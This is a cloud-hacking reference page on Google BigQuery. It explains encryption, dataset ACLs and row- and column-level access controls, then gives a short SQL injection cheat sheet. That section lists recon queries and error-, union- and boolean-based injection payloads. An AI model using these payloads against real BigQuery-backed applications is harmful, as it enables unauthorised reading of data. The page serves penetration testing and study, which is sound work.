GCP - Bigquery Enum
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Google Cloud BigQuery is a fully-managed, serverless enterprise data warehouse, offering capabilities for analysis over petabytes of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.
It supports querying using ANSI SQL. The main objects are datasets containing tables containing SQL data.
By default a Google-managed encryption key is used although it's possible to configure a Customer-managed encryption key (CMEK). It's possible to indicate the encryption key per dataset and per table inside a dataset.
It's possible to indicate an expiration time in the dataset so any new table created in this dataset will be automatically deleted the specified number of days after creation.
Bigquery is deeply integrated with other Google services. It's possible to load data from buckets, pub/sub, google drive, RDS databases...
When a dataset is created ACLs are attached to give access over it. By default it's given Owner privileges over the user that created the dataset and then Owner to the group projectOwners (Owners of the project), Writer to the group projectWriters, and Reader to the group projectReaders:
It's possible to control the rows a principal is going to be able to access inside a table with row access policies. These are defined inside the table using DDL. The access policy defines a filter and only the matching rows with that filter are going to be accessible by the indicated principals.
To restrict data access at the column level:
Define a taxonomy and policy tags. Create and manage a taxonomy and policy tags for your data. https://console.cloud.google.com/bigquery/policy-tags
Optional: Grant the Data Catalog Fine-Grained Reader role to one or more principals on one or more of the policy tags you created.
Assign policy tags to your BigQuery columns. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access.
Enforce access control on the taxonomy. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
Manage access on the policy tags. Use Identity and Access Management (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
When a user tries to access column data at query time, BigQuery checks the column policy tag and its policy to see whether the user is authorized to access the data.
As summary, to restrict the access to some columns to some users, you can add a tag to the column in the schema and restrict the access of the users to the tag enforcing access control on the taxonomy of the tag.
To enforce access control on the taxonomy it's needed to enable the service:
It's possible to see the tags of columns with:
For further information you can check the blog post: https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac. Here just some details are going to be given.
Comments:
select 1#from here it is not working
select 1/*between those it is not working*/
But just the initial one won't work
select 1--from here it is not working
Get information about the environment such as:
Current user: select session_user()
Project id: select @@project_id
Concat rows:
All table names: string_agg(table_name, ', ')
Get datasets, tables and column names:
Project and dataset name:
Column and table names of all the tables of the dataset:
Other datasets in the same project:
SQL Injection types:
Error based - casting: select CAST(@@project_id AS INT64)
Error based - division by zero: ' OR if(1/(length((select('a')))-1)=1,true,false) OR '
Union based (you need to use ALL in bigquery): UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
Boolean based: ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
Potential time based - Usage of public datasets example: SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000
Documentation:
Scripting statements: https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)